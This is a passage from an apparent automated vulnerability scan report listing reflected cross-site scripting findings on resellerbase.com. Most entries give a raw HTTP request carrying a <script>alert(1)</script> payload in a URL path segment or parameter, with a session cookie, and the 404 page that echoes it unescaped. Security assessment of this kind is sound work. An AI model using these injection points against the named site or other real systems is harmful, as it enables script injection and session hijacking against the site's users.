GET /detail/45/search.php?keyword=search...a4061<a>50281836e8d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.php?keyword=search...a4061<a>50281836e8d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3189. http://www.resellerbase.com/detail/45/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload afc0c<script>alert(1)</script>78c07d510a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/search.php?keyword=search...&Submit3=Search&opt=2&afc0c<script>alert(1)</script>78c07d510a5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.php?keyword=search...&Submit3=Search&opt=2&afc0c<script>alert(1)</script>78c07d510a5=1 was not found on this server.</p>
...[SNIP]...

2.3190. http://www.resellerbase.com/detail/45/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8ebdf<a>159d085e985 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/search.php?keyword=search...&Submit3=Search&opt=28ebdf<a>159d085e985 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.php?keyword=search...&Submit3=Search&opt=28ebdf<a>159d085e985 was not found on this server.</p>
...[SNIP]...

2.3191. http://www.resellerbase.com/detail/45/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f677<script>alert(1)</script>cf499dcc7c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8f677<script>alert(1)</script>cf499dcc7c0/45/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8f677<script>alert(1)</script>cf499dcc7c0/45/themes/ was not found on this server.</p>
...[SNIP]...

2.3192. http://www.resellerbase.com/detail/45/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cb55<script>alert(1)</script>88ab8af5063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/459cb55<script>alert(1)</script>88ab8af5063/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/459cb55<script>alert(1)</script>88ab8af5063/themes/ was not found on this server.</p>
...[SNIP]...

2.3193. http://www.resellerbase.com/detail/45/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e858<script>alert(1)</script>d0ac9895548 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes9e858<script>alert(1)</script>d0ac9895548/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes9e858<script>alert(1)</script>d0ac9895548/ was not found on this server.</p>
...[SNIP]...

2.3194. http://www.resellerbase.com/detail/45/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57045<script>alert(1)</script>3b2e4c45dd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/?57045<script>alert(1)</script>3b2e4c45dd9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/?57045<script>alert(1)</script>3b2e4c45dd9=1 was not found on this server.</p>
...[SNIP]...

2.3195. http://www.resellerbase.com/detail/45/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36841<script>alert(1)</script>a261b45a654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail36841<script>alert(1)</script>a261b45a654/45/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail36841<script>alert(1)</script>a261b45a654/45/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3196. http://www.resellerbase.com/detail/45/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66bde<script>alert(1)</script>60bf6cc565b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4566bde<script>alert(1)</script>60bf6cc565b/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4566bde<script>alert(1)</script>60bf6cc565b/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3197. http://www.resellerbase.com/detail/45/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5ae08<script>alert(1)</script>e2db34b963e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes5ae08<script>alert(1)</script>e2db34b963e/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes5ae08<script>alert(1)</script>e2db34b963e/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3198. http://www.resellerbase.com/detail/45/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 196d0<script>alert(1)</script>e3ee35fc8c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos196d0<script>alert(1)</script>e3ee35fc8c7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos196d0<script>alert(1)</script>e3ee35fc8c7/ was not found on this server.</p>
...[SNIP]...

2.3199. http://www.resellerbase.com/detail/45/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57db0<script>alert(1)</script>60659e1ffaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/?57db0<script>alert(1)</script>60659e1ffaa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/?57db0<script>alert(1)</script>60659e1ffaa=1 was not found on this server.</p>
...[SNIP]...

2.3200. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 141ac<script>alert(1)</script>5091caf4c65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail141ac<script>alert(1)</script>5091caf4c65/45/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail141ac<script>alert(1)</script>5091caf4c65/45/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3201. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 80b62<script>alert(1)</script>f3f84b63653 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4580b62<script>alert(1)</script>f3f84b63653/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4580b62<script>alert(1)</script>f3f84b63653/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3202. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81aa7<script>alert(1)</script>14462a464e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes81aa7<script>alert(1)</script>14462a464e9/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes81aa7<script>alert(1)</script>14462a464e9/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3203. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3095a<script>alert(1)</script>1499c7c4649 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos3095a<script>alert(1)</script>1499c7c4649/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos3095a<script>alert(1)</script>1499c7c4649/images/ was not found on this server.</p>
...[SNIP]...

2.3204. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 44eb0<script>alert(1)</script>610ee297568 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images44eb0<script>alert(1)</script>610ee297568/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images44eb0<script>alert(1)</script>610ee297568/ was not found on this server.</p>
...[SNIP]...

2.3205. http://www.resellerbase.com/detail/45/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d98fe<script>alert(1)</script>eddf6cef65b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/?d98fe<script>alert(1)</script>eddf6cef65b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/?d98fe<script>alert(1)</script>eddf6cef65b=1 was not found on this server.</p>
...[SNIP]...

2.3206. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a9ba<script>alert(1)</script>8c67de92cac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7a9ba<script>alert(1)</script>8c67de92cac/45/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7a9ba<script>alert(1)</script>8c67de92cac/45/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3207. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1513a<script>alert(1)</script>8b7f25b2e62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/451513a<script>alert(1)</script>8b7f25b2e62/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/451513a<script>alert(1)</script>8b7f25b2e62/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3208. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/

Issue detail

